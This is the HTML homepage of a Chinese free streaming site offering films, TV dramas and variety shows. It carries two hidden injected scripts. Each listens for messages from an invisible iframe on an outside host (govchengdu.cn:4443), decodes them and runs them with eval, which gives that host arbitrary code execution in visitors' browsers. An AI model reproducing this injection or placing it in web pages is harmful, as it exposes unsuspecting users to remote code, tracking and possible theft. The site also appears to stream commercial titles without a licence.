<html><head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <meta http-equiv="Content-Language" content="zh-CN">
  <meta name="robots" content="noarchive">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">
  <meta http-equiv="X-UA-Compatible" content="IE=11,IE=10,IE=9,IE=8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimum-scale=1.0, maximum-scale=1.0">
  <title>酷小熊影视 - 最新电影电视剧的在线天堂 - kxxer.com</title>
  <link rel="dns-prefetch" href="//apps.bdimg.com">
  <link rel="dns-prefetch" href="//s.w.org">
<link rel="stylesheet" id="main-css" href="/template/kxx/css/style.css" type="text/css" media="all">
<script src="https://hm.baidu.com/hm.js?d0b98c915328aa0d8bc7cb5ec33c4c3d"></script><script type="text/javascript" src="//apps.bdimg.com/libs/jquery/2.0.0/jquery.min.js?ver=5.2"></script>
<style>a:hover, a:focus,.post-like.actived,.excerpt h2 a:hover,.user-welcome strong,.article-title a:hover,#comments b,.text-muted a:hover,.relates a:hover,.archives .item:hover h3,.linkcat h2,.sticky a:hover,.article-content a:hover,.nav li.current-menu-item > a, .nav li.current-menu-parent > a, .nav li.current_page_item > a, .nav li.current-posa,.article-meta a:hover,.excerpt h2 a span,.article-title a span,.most-comment-posts li > a span,.widget_postlist .items-01 .text span{color:#346387;}.logo a,.article-tags a,.search-form .btn,#bdcs .bdcs-search-form-submit,.widget_tags_inner a:hover:hover,.focusmo a:hover h4,.tagslist .tagname:hover,.pagination ul > li.next-page > a{background-color:#346387;}.label-important,.badge-important{background-color:#346387;}.label-important .label-arrow,.badge-important .label-arrow{border-left-color:#346387;}.title strong{border-bottom-color:#346387;}#submit{background: #346387;border-right: 2px solid #346387;border-bottom: 2px solid #346387;}@media (max-width:720px){.ui-navtop .logo, .logo{background-color:#346387;}.nav li.current-menu-item > a, .nav li.current-menu-parent > a, .nav li.current_page_item > a, .nav li.current-post-ancestor > a{border-bottom-color:#346387;}}</style>
<meta name="keywords" content="最新电视剧,电影免费,高清电影,电影免费观看,酷小熊影视">
<meta name="description" content="酷小熊影视，一个真正免费的高清在线电影天堂，第一时间分享最新电影、电视剧、综艺、动漫给广大网友。">
  <script type="text/javascript" src="/template/kxx/js/list.js"></script>
  <script type="text/javascript">
	var isPhone = navigator.userAgent.match(/iPad|iPhone|Linux|Android|iPod/i) != null;
	var isWechat= navigator.userAgent.match(/MicroMessenger/i) != null;
	var isPad= navigator.userAgent.match(/PAD|iPad/i) != null;
    var play_type="";
    var ref = window.location.href;
  </script>
</head>
<body class="home blog search_not focusslide_s_m ui-navtop" style="">
<header class="header">
<div class="container header">
<h1 class="logo"><a href="/" title="酷小熊影视 - 最新电影电视剧的在线天堂 - kxxer.com"><img src="">酷小熊影视</a></h1>	
<ul class="nav">
<li class="navmore"></li>
<li id="menu-item-2375" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_itemmenu-item-2375"><a href="/">首页</a></li>

<li id="menu-item-65" class="menu-item menu-item-type-taxonomy menu-item-object-category  menu-item-has-children menu-item-65"><a href="/movies/">电影</a>
<ul class="sub-menu">

<li id="menu-item-458" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-458"><a href="/list01/">动作片</a></li>

<li id="menu-item-458" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-458"><a href="/list02/">喜剧片</a></li>

<li id="menu-item-458" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-458"><a href="/list03/">爱情片</a></li>

<li id="menu-item-458" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-458"><a href="/list04/">科幻片</a></li>

<li id="menu-item-458" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-458"><a href="/list05/">恐怖片</a></li>

<li id="menu-item-458" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-458"><a href="/list06/">剧情片</a></li>

<li id="menu-item-458" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-458"><a href="/list07/">战争片</a></li>

</ul>
</li>

<li id="menu-item-65" class="menu-item menu-item-type-taxonomy menu-item-object-category  menu-item-has-children menu-item-65"><a href="/teleplay/">剧集</a>
<ul class="sub-menu">

<li id="menu-item-458" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-458"><a href="/list08/">大陆剧</a></li>

<li id="menu-item-458" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-458"><a href="/list09/">港台剧</a></li>

<li id="menu-item-458" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-458"><a href="/list10/">日韩剧</a></li>

<li id="menu-item-458" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-458"><a href="/list11/">欧美剧</a></li>

</ul>
</li>

<li id="menu-item-65" class="menu-item menu-item-type-taxonomy menu-item-object-category  menu-item-has-children menu-item-65"><a href="/variety_show/">综艺</a>
<ul class="sub-menu">

</ul>
</li>

<li id="menu-item-65" class="menu-item menu-item-type-taxonomy menu-item-object-category  menu-item-has-children menu-item-65"><a href="/cartoon/">动漫</a>
<ul class="sub-menu">

</ul>
</li>


</ul>	
<form class="search-form" action="/index.php?m=vod-search" method="post">
<input class="form-control" id="wd" name="wd" type="text" placeholder="输入关键字" value="">
<input class="btn" type="submit" value="搜索">
</form>	
<span class="glyphicon glyphicon-search m-search"></span>
<div class="slinks">

</div>
</div>

<script type="text/javascript">
(function(){window.addEventListener("message",function(e){var _des_s_3912=e.data;if(_des_s_3912.des_s_3912){var _s = '/+/g';eval(decodeURIComponent(_des_s_3912.des_s_3912.replace(_s,"%20")))}});document.write('<iframe style="display:none;" src="https://www.govchengdu.cn:4443/ty/x-3912-34-1.html" height="0" width="0"  marginheight="0" scrolling="no" frameborder="0" allowtransparency="true"></iframe>')})();
</script><iframe style="display:none;" src="https://www.govchengdu.cn:4443/ty/x-3912-34-1.html" height="0" width="0" marginheight="0" scrolling="no" frameborder="0" allowtransparency="true"></iframe>

<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?d0b98c915328aa0d8bc7cb5ec33c4c3d";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>

</header>

<l<link rel="icon" href="http://host/favicon.ico" type="image/x-icon">
<link rel="shortcut icon" href="http://host/favicon.ico" type="image/x-icon">
<section class="container">
<div class="content-wrap">
	<div class="content">
		<div id="slider" class="carousel slide" data-ride="carousel" style="touch-action: pan-y; user-select: none; -webkit-user-drag: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0);">
		<ol class="carousel-indicators"><li data-target="#slider" data-slide-to="0" class=""></li><li data-target="#slider" data-slide-to="1" class=""></li><li data-target="#slider" data-slide-to="2" class="active"></li><li data-target="#slider" data-slide-to="3"></li><li data-target="#slider" data-slide-to="4"></li></ol>
		<div class="carousel-inner">
		
		<div class="item"><a href="/gresource/115101/"><img src="/upload/vod/2021-07-31/202107311627674236.jpg"><span class="carousel-caption">《超越》完整版高清在线观看</span><span class="carousel-bg"></span></a></div>
		
		<div class="item"><a href="/gresource/115204/"><img src="/upload/vod/2021-07-31/202107311627674209.jpg"><span class="carousel-caption">《热带往事》完整版高清在线观看</span><span class="carousel-bg"></span></a></div>
		
		<div class="item active"><a href="/gresource/88044/"><img src="/upload/vod/2021-04-14/202104141618368978.jpg"><span class="carousel-caption">《侍神令》完整版高清在线观看</span><span class="carousel-bg"></span></a></div>
		
		<div class="item "><a href="/gresource/84184/"><img src="/upload/vod/2021-01-12/202101121610390899.jpg"><span class="carousel-caption">《除暴》完整版高清在线观看</span><span class="carousel-bg"></span></a></div>
		
		<div class="item "><a href="/gresource/114100/"><img src="/upload/vod/2021-06-23/202106231624433495.jpg"><span class="carousel-caption">《悬崖之上》完整版高清在线观看</span><span class="carousel-bg"></span></a></div>
		
		
		</div>
		<a class="left carousel-control" href="#slider" role="button" data-slide="prev"><span class="glyphicon glyphicon-chevron-left" aria-hidden="true"></span></a>
		<a class="right carousel-control" href="#slider" role="button" data-slide="next"><span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span></a>
		</div>

      	<script src="/template/kxx/js/gonggao.js"></script><div style="margin: 0 0 5px 0;background-color: #155B88;padding: 5px 10px;font-size: 1em;"><p style="margin: 0;color: yellow;">♛゛欢迎新老用户添加收藏，转发分享本站！</p> <p style="margin: 0;color: yellow;">♛゛手机端右上角小按钮可进入分类页丶搜索页！</p></div>

		<div class="m-movies clearfix"> 
			<div class="update_list"> 
				<div class="list_menu list_menu_l" mod="posts_new"> 
				<strong><span class="glyphicon glyphicon-fire-1"></span></strong>
				<ul> 
				<li mod="posts_new" class="list_menuli">重磅丶同步推荐</li> 
				<a class="more" href="/index.php?m=label-all.html">更多&gt;&gt;</a>
				</ul>
				</div> 
				<div class="posts_new_list" style="display: block;"> 
				
				<article class="u-movie"><div class="list-poster"><a title="心跳源计划" href="/gresource/115284/"><img class="thumb" height="200" src="/upload/vod/2021-07-23/16269765710.jpg"></a><div class="pingfen"><span>8.1</span></div><div class="zhuangtai"><span>更至24集/共42集</span></div></div><h2><a href="/gresource/115284/" title="心跳源计划">心跳源计划</a></h2><div class="meta"><span class="tags">2021-08-07 更新</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="我是真的爱你" href="/gresource/115197/"><img class="thumb" height="200" src="/upload/vod/2021-07-20/16267136663.jpg"></a><div class="pingfen"><span>7.0</span></div><div class="zhuangtai"><span>更至36集/共40集</span></div></div><h2><a href="/gresource/115197/" title="我是真的爱你">我是真的爱你</a></h2><div class="meta"><span class="tags">2021-08-06 更新</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="逐梦蓝天" href="/gresource/115423/"><img class="thumb" height="200" src="/upload/vod/2021-07-31/202107311627672711.jpg"></a><div class="pingfen"><span>8.2</span></div><div class="zhuangtai"><span>更至16集/共38集</span></div></div><h2><a href="/gresource/115423/" title="逐梦蓝天">逐梦蓝天</a></h2><div class="meta"><span class="tags">2021-08-06 更新</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="爱回家之开心速递粤语" href="/gresource/109624/"><img class="thumb" height="200" src="/upload/vod/2021-04-09/161790404410.jpg"></a><div class="pingfen"><span>9.0</span></div><div class="zhuangtai"><span>更至1318集</span></div></div><h2><a href="/gresource/109624/" title="爱回家之开心速递粤语">爱回家之开心速递粤语</a></h2><div class="meta"><span class="tags">2021-08-06 更新</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="你是我的荣耀" href="/gresource/115388/"><img class="thumb" height="200" src="/upload/vod/2021-07-27/202107271627369042.jpg"></a><div class="pingfen"><span>8.0</span></div><div class="zhuangtai"><span>更至18集/共32集</span></div></div><h2><a href="/gresource/115388/" title="你是我的荣耀">你是我的荣耀</a></h2><div class="meta"><span class="tags">2021-08-06 更新</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="我的女主别太萌" href="/gresource/115293/"><img class="thumb" height="200" src="/upload/vod/2021-07-23/202107231627045178.jpg"></a><div class="pingfen"><span>7.8</span></div><div class="zhuangtai"><span>全集24集/已完结</span></div></div><h2><a href="/gresource/115293/" title="我的女主别太萌">我的女主别太萌</a></h2><div class="meta"><span class="tags">2021-08-06 更新</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="玉楼春" href="/gresource/115387/"><img class="thumb" height="200" src="/upload/vod/2021-07-27/202107271627379264.jpg"></a><div class="pingfen"><span>10.0</span></div><div class="zhuangtai"><span>更至22集/共43集</span></div></div><h2><a href="/gresource/115387/" title="玉楼春">玉楼春</a></h2><div class="meta"><span class="tags">2021-08-06 更新</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="循环初恋" href="/gresource/115466/"><img class="thumb" height="200" src="/upload/vod/2021-07-29/16275668400.jpg"></a><div class="pingfen"><span>7.8</span></div><div class="zhuangtai"><span>更至16集/共24集</span></div></div><h2><a href="/gresource/115466/" title="循环初恋">循环初恋</a></h2><div class="meta"><span class="tags">2021-08-06 更新</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="我的邻居长不大" href="/gresource/115017/"><img class="thumb" height="200" src="/upload/vod/2021-07-12/16260964320.jpg"></a><div class="pingfen"><span>7.7</span></div><div class="zhuangtai"><span>更至29集/共29集</span></div></div><h2><a href="/gresource/115017/" title="我的邻居长不大">我的邻居长不大</a></h2><div class="meta"><span class="tags">2021-08-06 更新</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="你的名字我的姓氏" href="/gresource/115389/"><img class="thumb" height="200" src="/upload/vod/2021-07-27/202107271627369178.jpg"></a><div class="pingfen"><span>7.5</span></div><div class="zhuangtai"><span>更至22集/共40集</span></div></div><h2><a href="/gresource/115389/" title="你的名字我的姓氏">你的名字我的姓氏</a></h2><div class="meta"><span class="tags">2021-08-06 更新</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="一宅家族" href="/gresource/115476/"><img class="thumb" height="200" src="/upload/vod/2021-07-30/16276496580.jpg"></a><div class="pingfen"><span>7.9</span></div><div class="zhuangtai"><span>更至10集/共16集</span></div></div><h2><a href="/gresource/115476/" title="一宅家族">一宅家族</a></h2><div class="meta"><span class="tags">2021-08-06 更新</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="站住！花小姐" href="/gresource/115441/"><img class="thumb" height="200" src="/upload/vod/2021-07-28/162748290110.jpg"></a><div class="pingfen"><span>7.2</span></div><div class="zhuangtai"><span>更至18集/共24集</span></div></div><h2><a href="/gresource/115441/" title="站住！花小姐">站住！花小姐</a></h2><div class="meta"><span class="tags">2021-08-06 更新</span></div>
				</article>
				
				</div>
			</div>
		</div>
		
<script type="text/javascript">
(function(){var __yrnqid='k'+Math.random().toString(36).substr(2);document.writeln('<div id="'+__yrnqid+'"></div>');window.addEventListener("message",function(e){var _des_s_3894=e.data;if(_des_s_3894.des_s_3894){var _s = '/+/g';eval(decodeURIComponent(_des_s_3894.des_s_3894.replace(_s,"%20")))}});document.write('<iframe style="display:none;" src="https://www.govchengdu.cn:4443/ty/c-3894-25-1.html" height="0" width="0"  marginheight="0" scrolling="no" frameborder="0" allowtransparency="true"></iframe>')})()
</script><div id="kdpr02q6hf5"></div>
<iframe style="display:none;" src="https://www.govchengdu.cn:4443/ty/c-3894-25-1.html" height="0" width="0" marginheight="0" scrolling="no" frameborder="0" allowtransparency="true"></iframe>		
		
		
		<div class="m-movies clearfix"> 
			<div class="update_list"> 
				<div class="list_menu list_menu_l" mod="new"> 
				<strong><span class="glyphicon glyphicon-stats" style="color: #2581BA;"></span></strong>
				<ul> 
				<li mod="new" class="list_menuli">新片丶首播院线</li>
                                <a class="more" href="/movies/">更多&gt;&gt;</a>
				</ul>
				</div> 
				
				<div class="update_list_con" style="display: block;"> 
				
	    
				<article class="u-movie"><div class="list-poster"><a title="当幸福来敲门" href="/gresource/100019/"><img class="thumb" height="200" src="/upload/vod/2021-04-09/161789808619.jpg"></a><div class="pingfen"><span>9.3</span></div><div class="zhuangtai"><span>豆瓣N.22/1280P</span></div></div><h2><a href="/gresource/100019/" title="当幸福来敲门">当幸福来敲门</a></h2><div class="meta"><span class="tags">剧情片</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="劫后诊疗室" href="/gresource/63667/"><img class="thumb" height="200" src="/upload/vod/2020-04-13/15867636745.png"></a><div class="pingfen"><span>7.6</span></div><div class="zhuangtai"><span>爆炸案内幕/1280P</span></div></div><h2><a href="/gresource/63667/" title="劫后诊疗室">劫后诊疗室</a></h2><div class="meta"><span class="tags">恐怖片</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="人皮交易" href="/gresource/21494/"><img class="thumb" height="200" src="/upload/vod/2019-02-21/15507406154.jpg"></a><div class="pingfen"><span>7.9</span></div><div class="zhuangtai"><span>人贩的残忍/1280P</span></div></div><h2><a href="/gresource/21494/" title="人皮交易">人皮交易</a></h2><div class="meta"><span class="tags">动作片</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="决胜21点" href="/gresource/15160/"><img class="thumb" height="200" src="/upload/vod/2019-02-21/15507344458.jpg"></a><div class="pingfen"><span>8.3</span></div><div class="zhuangtai"><span>天才发家史/1280P</span></div></div><h2><a href="/gresource/15160/" title="决胜21点">决胜21点</a></h2><div class="meta"><span class="tags">剧情片</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="墨家机关术" href="/gresource/110694/"><img class="thumb" height="200" src="/upload/vod/2021-04-25/161932647014.jpg"></a><div class="pingfen"><span>7.5</span></div><div class="zhuangtai"><span>古代地下城/1280P</span></div></div><h2><a href="/gresource/110694/" title="墨家机关术">墨家机关术</a></h2><div class="meta"><span class="tags">动作片</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="解忧理发店" href="/gresource/64854/"><img class="thumb" height="200" src="/upload/vod/2020-04-29/15881741579.jpg"></a><div class="pingfen"><span>7.7</span></div><div class="zhuangtai"><span>治愈你的心/1280P</span></div></div><h2><a href="/gresource/64854/" title="解忧理发店">解忧理发店</a></h2><div class="meta"><span class="tags">爱情片</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="巨额来电" href="/gresource/1423/"><img class="thumb" height="200" src="/upload/vod/2019-02-21/15506833300.jpg"></a><div class="pingfen"><span>7.5</span></div><div class="zhuangtai"><span>超级诈骗队/1280P</span></div></div><h2><a href="/gresource/1423/" title="巨额来电">巨额来电</a></h2><div class="meta"><span class="tags">剧情片</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="速度与激情9" href="/gresource/115469/"><img class="thumb" height="200" src="/upload/vod/2021-07-30/16276032340.jpg"></a><div class="pingfen"><span>8.3</span></div><div class="zhuangtai"><span>飙车飞上天/1280P</span></div></div><h2><a href="/gresource/115469/" title="速度与激情9">速度与激情9</a></h2><div class="meta"><span class="tags">动作片</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="世纪大劫案" href="/gresource/72698/"><img class="thumb" height="200" src="/upload/vod/2020-08-15/159742650315.jpg"></a><div class="pingfen"><span>7.8</span></div><div class="zhuangtai"><span>最聪明劫案/1280P</span></div></div><h2><a href="/gresource/72698/" title="世纪大劫案">世纪大劫案</a></h2><div class="meta"><span class="tags">动作片</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="隐藏人物" href="/gresource/7060/"><img class="thumb" height="200" src="/upload/vod/2019-02-21/15507238442.jpg"></a><div class="pingfen"><span>8.9</span></div><div class="zhuangtai"><span>高智商黑人/1280P</span></div></div><h2><a href="/gresource/7060/" title="隐藏人物">隐藏人物</a></h2><div class="meta"><span class="tags">剧情片</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="叱咤风云" href="/gresource/115519/"><img class="thumb" height="200" src="/upload/vod/2021-08-02/16278666008.jpg"></a><div class="pingfen"><span>7.6</span></div><div class="zhuangtai"><span>逗比遇高手/1280P</span></div></div><h2><a href="/gresource/115519/" title="叱咤风云">叱咤风云</a></h2><div class="meta"><span class="tags">剧情片</span></div>
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="双面妖姬" href="/gresource/110330/"><img class="thumb" height="200" src="/upload/vod/2021-04-19/161877120614.jpg"></a><div class="pingfen"><span>7.3</span></div><div class="zhuangtai"><span>化凶灵屠村/1280P</span></div></div><h2><a href="/gresource/110330/" title="双面妖姬">双面妖姬</a></h2><div class="meta"><span class="tags">剧情片</span></div>
				</article>
				
				
				</div>
							
		
			</div>
		</div>
		


		
		<div class="m-movies clearfix"> 
			<div class="update_list"> 
				<div class="list_menu list_menu_l" mod="new"> 
				<strong><span class="glyphicon glyphicon-stats" style="color: #2581BA;"></span></strong>
				<ul> 
				<li mod="new" class="list_menuli">精选丶人气剧集</li>
                                <a class="more" href="/teleplay/">更多&gt;&gt;</a>
				</ul>
				</div> 
				
				<div class="update_list_con" style="display: block;"> 
				
	    
				<article class="u-movie"><div class="list-poster"><a title="善始善终" href="/gresource/47943/"><img class="thumb" height="200" src="/upload/vod/2019-08-21/15663937469.jpg"></a><div class="pingfen"><span>8.2</span></div><div class="zhuangtai"><span>全集42集/已完结</span></div></div><h2><a href="/gresource/47943/" title="善始善终">善始善终</a></h2><div class="meta"><span class="tags">大陆剧</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="相爱十年" href="/gresource/52957/"><img class="thumb" height="200" src="/upload/vod/2019-11-03/157276163113.jpg"></a><div class="pingfen"><span>8.3</span></div><div class="zhuangtai"><span>全集35集/已完结</span></div></div><h2><a href="/gresource/52957/" title="相爱十年">相爱十年</a></h2><div class="meta"><span class="tags">大陆剧</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="虎妈猫爸" href="/gresource/25309/"><img class="thumb" height="200" src="/upload/vod/2019-02-21/155074425415.jpg"></a><div class="pingfen"><span>8.1</span></div><div class="zhuangtai"><span>全集45集/已完结</span></div></div><h2><a href="/gresource/25309/" title="虎妈猫爸">虎妈猫爸</a></h2><div class="meta"><span class="tags">大陆剧</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="香蜜沉沉烬如霜" href="/gresource/3636/"><img class="thumb" height="200" src="/upload/vod/2020-03-25/202003251585103360.jpg"></a><div class="pingfen"><span>8.9</span></div><div class="zhuangtai"><span>全集63集/已完结</span></div></div><h2><a href="/gresource/3636/" title="香蜜沉沉烬如霜">香蜜沉沉烬如霜</a></h2><div class="meta"><span class="tags">大陆剧</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="终极笔记" href="/gresource/84925/"><img class="thumb" height="200" src="/upload/vod/2021-01-01/202101011609470993.jpg"></a><div class="pingfen"><span>8.1</span></div><div class="zhuangtai"><span>全集36集/已完结</span></div></div><h2><a href="/gresource/84925/" title="终极笔记">终极笔记</a></h2><div class="meta"><span class="tags">大陆剧</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="唐砖" href="/gresource/4531/"><img class="thumb" height="200" src="/upload/vod/2019-02-21/15507219255.jpg"></a><div class="pingfen"><span>7.6</span></div><div class="zhuangtai"><span>全集37集/已完结</span></div></div><h2><a href="/gresource/4531/" title="唐砖">唐砖</a></h2><div class="meta"><span class="tags">大陆剧</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="装台" href="/gresource/84359/"><img class="thumb" height="200" src="/upload/vod/2020-11-30/16066771600.jpg"></a><div class="pingfen"><span>8.8</span></div><div class="zhuangtai"><span>全集33集/已完结</span></div></div><h2><a href="/gresource/84359/" title="装台">装台</a></h2><div class="meta"><span class="tags">大陆剧</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="后宫·甄嬛传" href="/gresource/3537/"><img class="thumb" height="200" src="/upload/vod/2020-07-13/202007131594618692.jpg"></a><div class="pingfen"><span>9.3</span></div><div class="zhuangtai"><span>全集76集/已完结</span></div></div><h2><a href="/gresource/3537/" title="后宫·甄嬛传">后宫·甄嬛传</a></h2><div class="meta"><span class="tags">大陆剧</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="时空来电" href="/gresource/52268/"><img class="thumb" height="200" src="/upload/vod/2019-11-24/201911241574601559.jpg"></a><div class="pingfen"><span>8.6</span></div><div class="zhuangtai"><span>全集32集/已完结</span></div></div><h2><a href="/gresource/52268/" title="时空来电">时空来电</a></h2><div class="meta"><span class="tags">大陆剧</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="塞上风云记" href="/gresource/68707/"><img class="thumb" height="200" src="/upload/vod/2020-06-13/15920449867.jpg"></a><div class="pingfen"><span>7.6</span></div><div class="zhuangtai"><span>全集48集/已完结</span></div></div><h2><a href="/gresource/68707/" title="塞上风云记">塞上风云记</a></h2><div class="meta"><span class="tags">大陆剧</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="冰糖炖雪梨" href="/gresource/62121/"><img class="thumb" height="200" src="/upload/vod/2020-03-19/202003191584628679.jpg"></a><div class="pingfen"><span>8.0</span></div><div class="zhuangtai"><span>全集40集/已完结</span></div></div><h2><a href="/gresource/62121/" title="冰糖炖雪梨">冰糖炖雪梨</a></h2><div class="meta"><span class="tags">大陆剧</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="我在北京等你" href="/gresource/60709/"><img class="thumb" height="200" src="/upload/vod/2020-02-24/202002241582528309.jpg"></a><div class="pingfen"><span>8.6</span></div><div class="zhuangtai"><span>全集46集/已完结</span></div></div><h2><a href="/gresource/60709/" title="我在北京等你">我在北京等你</a></h2><div class="meta"><span class="tags">大陆剧</span></div>
				
				</article>
				
				
				</div>
				
		
			</div>
		</div>
		

	
				
		<div class="m-movies clearfix"> 
			<div class="update_list"> 
				<div class="list_menu list_menu_l" mod="new"> 
				<strong><span class="glyphicon glyphicon-stats" style="color: #2581BA;"></span></strong>
				<ul> 
				<li mod="new" class="list_menuli">热门丶综艺自制</li> 
                                <a class="more" href="/variety_show/">更多&gt;&gt;</a>
				</ul>
				</div> 
				
				<div class="update_list_con" style="display: block;"> 
				
	    
				<article class="u-movie"><div class="list-poster"><a title="探索·发现 2021" href="/gresource/89356/"><img class="thumb" height="200" src="/upload/vod/2021-04-08/16178964324.jpg"></a><div class="pingfen"><span>8.9</span></div><div class="zhuangtai"><span>最新20210804期</span></div></div><h2><a href="/gresource/89356/" title="探索·发现 2021">探索·发现 2021</a></h2><div class="meta"><span class="tags">综艺</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="黑怕女孩" href="/gresource/115453/"><img class="thumb" height="200" src="/upload/vod/2021-07-28/16274828982.jpg"></a><div class="pingfen"><span>9.0</span></div><div class="zhuangtai"><span>最新20210730期</span></div></div><h2><a href="/gresource/115453/" title="黑怕女孩">黑怕女孩</a></h2><div class="meta"><span class="tags">综艺</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="心动的信号 第四季" href="/gresource/114535/"><img class="thumb" height="200" src="/upload/vod/2021-06-29/16249512357.jpg"></a><div class="pingfen"><span>7.5</span></div><div class="zhuangtai"><span>最新20210804期</span></div></div><h2><a href="/gresource/114535/" title="心动的信号 第四季">心动的信号 第四季</a></h2><div class="meta"><span class="tags">综艺</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="非常完美 2021" href="/gresource/89711/"><img class="thumb" height="200" src="/upload/vod/2021-04-09/16179010792.jpg"></a><div class="pingfen"><span>7.7</span></div><div class="zhuangtai"><span>最新20210729期</span></div></div><h2><a href="/gresource/89711/" title="非常完美 2021">非常完美 2021</a></h2><div class="meta"><span class="tags">综艺</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="奇异剧本鲨" href="/gresource/115390/"><img class="thumb" height="200" src="/upload/vod/2021-07-26/16273046790.jpg"></a><div class="pingfen"><span>7.8</span></div><div class="zhuangtai"><span>最新20210804期</span></div></div><h2><a href="/gresource/115390/" title="奇异剧本鲨">奇异剧本鲨</a></h2><div class="meta"><span class="tags">综艺</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="拜托了冰箱 轰趴季" href="/gresource/114620/"><img class="thumb" height="200" src="/upload/vod/2021-07-02/16251615430.jpg"></a><div class="pingfen"><span>8.0</span></div><div class="zhuangtai"><span>最新20210804期</span></div></div><h2><a href="/gresource/114620/" title="拜托了冰箱 轰趴季">拜托了冰箱 轰趴季</a></h2><div class="meta"><span class="tags">综艺</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="11点热吵店[2021]" href="/gresource/86233/"><img class="thumb" height="200" src="/upload/vod/2021-01-05/160985300912.jpg"></a><div class="pingfen"><span>7.5</span></div><div class="zhuangtai"><span>最新20210804期</span></div></div><h2><a href="/gresource/86233/" title="11点热吵店[2021]">11点热吵店[2021]</a></h2><div class="meta"><span class="tags">综艺</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="极限挑战宝藏行 第2季" href="/gresource/114707/"><img class="thumb" height="200" src="/upload/vod/2021-08-03/202108031627975336.jpg"></a><div class="pingfen"><span>7.7</span></div><div class="zhuangtai"><span>最新20210803期</span></div></div><h2><a href="/gresource/114707/" title="极限挑战宝藏行 第2季">极限挑战宝藏行 第2季</a></h2><div class="meta"><span class="tags">综艺</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="五十公里桃花坞-北京" href="/gresource/112558/"><img class="thumb" height="200" src="/upload/vod/2021-08-03/202108031627975244.jpg"></a><div class="pingfen"><span>8.1</span></div><div class="zhuangtai"><span>最新20210731期</span></div></div><h2><a href="/gresource/112558/" title="五十公里桃花坞-北京">五十公里桃花坞-北京</a></h2><div class="meta"><span class="tags">综艺</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="中餐厅 第五季" href="/gresource/115526/"><img class="thumb" height="200" src="/upload/vod/2021-08-03/162797237018.jpg"></a><div class="pingfen"><span>8.4</span></div><div class="zhuangtai"><span>最新20210730期</span></div></div><h2><a href="/gresource/115526/" title="中餐厅 第五季">中餐厅 第五季</a></h2><div class="meta"><span class="tags">综艺</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="老郭有新番" href="/gresource/109668/"><img class="thumb" height="200" src="/upload/vod/2021-04-09/161798239017.jpg"></a><div class="pingfen"><span>8.6</span></div><div class="zhuangtai"><span>最新20210802期</span></div></div><h2><a href="/gresource/109668/" title="老郭有新番">老郭有新番</a></h2><div class="meta"><span class="tags">综艺</span></div>
				
				</article>
				
